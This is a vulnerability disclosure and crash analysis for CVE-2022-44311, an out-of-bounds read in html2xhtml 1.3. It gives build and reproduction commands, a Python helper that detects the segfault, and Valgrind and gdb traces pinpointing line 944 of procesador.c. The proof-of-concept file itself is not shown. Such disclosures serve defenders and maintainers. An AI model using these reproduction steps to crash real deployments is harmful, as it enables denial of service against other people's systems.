# Description for CVE-2022-44311
html2xhtml v1.3 contains an out-of-bounds read in the function `static void elm_close(tree_node_t *nodo)` in `procesador.c`. This vulnerability allows attackers to access sensitive files or cause a denial of service (DoS) via a crafted HTML file.
# Reproduction
To reproduce the vulnerability, download a vulnerable version of html2xhtml (v1.3) and compile the project:
```
wget http://www.it.uc3m.es/jaf/html2xhtml/downloads/html2xhtml-1.3.tar.gz
tar -xzvf html2xhtml-1.3.tar.gz
cd html2xhtml-1.3
./configure
make
cd src
```
Once the project has been compiled, point html2xhtml at the proof-of-concept file included in this repository (`CVE-2022-44311_crash`):
```
./html2xhtml -t frameset ./CVE-2022-44311_crash
```
The command crashes with a segmentation fault. The shell message below was captured from the project root, hence the `./src/` prefix:
```
zsh: segmentation fault ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
```
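The crash can also be detected from a script, which is handy when checking several builds. The following is a minimal sketch and not part of the original repository: the function names `describe_exit` and `run_poc` are hypothetical, and the default paths assume the script is run from the `src` directory as in the steps above.

```python
import signal
import subprocess


def describe_exit(returncode: int) -> str:
    """Turn a subprocess return code into a short label."""
    if returncode < 0:
        # On POSIX, subprocess reports a process killed by a signal
        # as the negated signal number.
        return signal.Signals(-returncode).name
    return f"exit {returncode}"


def run_poc(binary: str = "./html2xhtml",
            poc: str = "./CVE-2022-44311_crash") -> str:
    """Run html2xhtml on the proof-of-concept file and label the result."""
    result = subprocess.run(
        [binary, "-t", "frameset", poc],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return describe_exit(result.returncode)
```

Calling `run_poc()` against a vulnerable build is expected to return `"SIGSEGV"`, matching the shell message above.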
Running the program under Valgrind helps identify the cause of the crash:
```
$ valgrind ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753== Memcheck, a memory error detector
==267753== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==267753== Using Valgrind-3.19.0 and LibVEX; rerun with -h for copyright info
==267753== Command: ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753==
==267753== Invalid read of size 4
==267753== at 0x11B18A: elm_close (procesador.c:944)
==267753== by 0x11B18A: err_html_struct (procesador.c:1889)
==267753== by 0x11BBB5: err_content_invalid (procesador.c:1291)
==267753== by 0x11BBB5: elm_close.part.0 (procesador.c:959)
==267753== by 0x11C4C0: elm_close (procesador.c:944)
==267753== by 0x11C4C0: saxEndDocument (procesador.c:233)
==267753== by 0x1144AE: main (html2xhtml.c:117)
==267753== Address 0x3ec404 is not stack'd, malloc'd or (recently) free'd
==267753==
```
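Valgrind reports an invalid read of size 4 at `procesador.c`, line 944, in `elm_close`, which the compiler has inlined into `err_html_struct` (both frames share the address 0x11B18A). The address being read is not part of any stack or heap allocation. Running the program under gdb (here with the pwndbg extension) with the crafted file confirms the Valgrind output: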
```
$ gdb src/html2xhtml
pwndbg> r -t frameset ./CVE-2022-44311_crash
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────[ REGISTERS ]────────────────────────────────
RAX 0xb11ae
RBX 0x5555555dd344 ◂— 0x3
RCX 0x5a
RDX 0x2
RDI 0x555555573d40 (elm_list) ◂— 0x6c6d7468 /* 'html' */
RSI 0x555555573160 (elm_buffer) ◂— 0xd9810100028b8101
R8 0x1
R9 0x5555555ee520 ◂— 0x5555555ee
R10 0x0
R11 0x7ffff7df2800 (iconv_close) ◂— cmp rdi, -1
R12 0x5555555dd2d6 ◂— 0x0
R13 0x7ffffffedc70 ◂— 0x600000001
R14 0x5555555dd2d6 ◂— 0x0
R15 0x4
RBP 0x555555573d40 (elm_list) ◂— 0x6c6d7468 /* 'html' */
RSP 0x7ffffffedc30 ◂— 0x1
RIP 0x55555556718a (err_html_struct+474) ◂— cmp dword ptr [rbp + rax*4 + 0xc], 4
─────────────────────────────────[ DISASM ]──────────────────────────────────
 ► 0x55555556718a <err_html_struct+474> cmp dword ptr [rbp + rax*4 + 0xc], 4
   0x55555556718f <err_html_struct+479> jne err_html_struct+489 <err_html_struct+489>
    ↓
   0x555555567199 <err_html_struct+489> mov rbx, qword ptr [rbx + 8]
   0x55555556719d <err_html_struct+493> test rbx, rbx
   0x5555555671a0 <err_html_struct+496> jne err_html_struct+448 <err_html_struct+448>
    ↓
   0x555555567170 <err_html_struct+448> cmp r12, rbx
   0x555555567173 <err_html_struct+451> je err_html_struct+498 <err_html_struct+498>
    ↓
   0x5555555671a2 <err_html_struct+498> xor edi, edi
   0x5555555671a4 <err_html_struct+500> mov qword ptr [rip + 0x4d6d5], r12 <actual_element>
   0x5555555671ab <err_html_struct+507> call new_tree_node <new_tree_node>
   0x5555555671b0 <err_html_struct+512> mov dword ptr [rax + 0x18], 0x59
──────────────────────────────[ SOURCE (CODE) ]──────────────────────────────
In file: /dev/shm/html2xhtml-1.3/src/procesador.c
   939 static void elm_close(tree_node_t *nodo)
   940 {
   941 DEBUG("elm_close()");
   942 EPRINTF1("cerrando elemento %s\n",ELM_PTR(nodo).name);
   943
 ► 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
   945 /* si es de tipo child se comprueba su contenido */
   946 int content[16384];
   947 int i, num;
   948 tree_node_t *elm;
   949
```
gdb confirms that the program reads from an invalid memory address while evaluating the `if` condition on line 944, which indexes `contenttype` with `doctype` for the element selected by `ELM_PTR(nodo)`:
```
► 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
945 /* si es de tipo child se comprueba su contenido */
946 int content[16384];
947 int i, num;
948 tree_node_t *elm;
```
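As a cross-check, the operand address of the faulting instruction `cmp dword ptr [rbp + rax*4 + 0xc], 4` can be recomputed from the register dump. The sketch below is not part of the original analysis. It assumes the Valgrind run computed the same index as the gdb run, and the helper name `effective_address` is made up for illustration.

```python
def effective_address(base: int, index: int, scale: int, disp: int) -> int:
    """Address of an x86-64 memory operand [base + index*scale + disp]."""
    return base + index * scale + disp


# Values copied from the pwndbg register dump.
GDB_ELM_LIST = 0x555555573D40  # RBP, labelled (elm_list)
GDB_RAX = 0xB11AE              # RAX, used as the index register

# Address read by the faulting cmp instruction in the gdb run.
gdb_fault = effective_address(GDB_ELM_LIST, GDB_RAX, 4, 0xC)

# Distance of the read from the start of elm_list.
offset = gdb_fault - GDB_ELM_LIST

# Address reported by Valgrind ("Address 0x3ec404 is not stack'd, ...").
VALGRIND_FAULT = 0x3EC404

# Assumption: same offset in both runs, so this is where elm_list
# would have been located under Valgrind.
valgrind_elm_list = VALGRIND_FAULT - offset

print(hex(gdb_fault))          # 0x555555838404
print(hex(offset))             # 0x2c46c4
print(hex(valgrind_elm_list))  # 0x127d40
```

The read lands 0x2c46c4 bytes (roughly 2.9 million bytes) past the start of `elm_list`. Subtracting the same offset from the address Valgrind reported gives 0x127d40, which shares its low 12 bits (0xd40) with the `elm_list` address seen in gdb. That is consistent with both tools observing the same out-of-range index, with the binary loaded at a different base address.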
# References
* https://vulners.com/cve/CVE-2022-44311
* https://cwe.mitre.org/data/definitions/125.html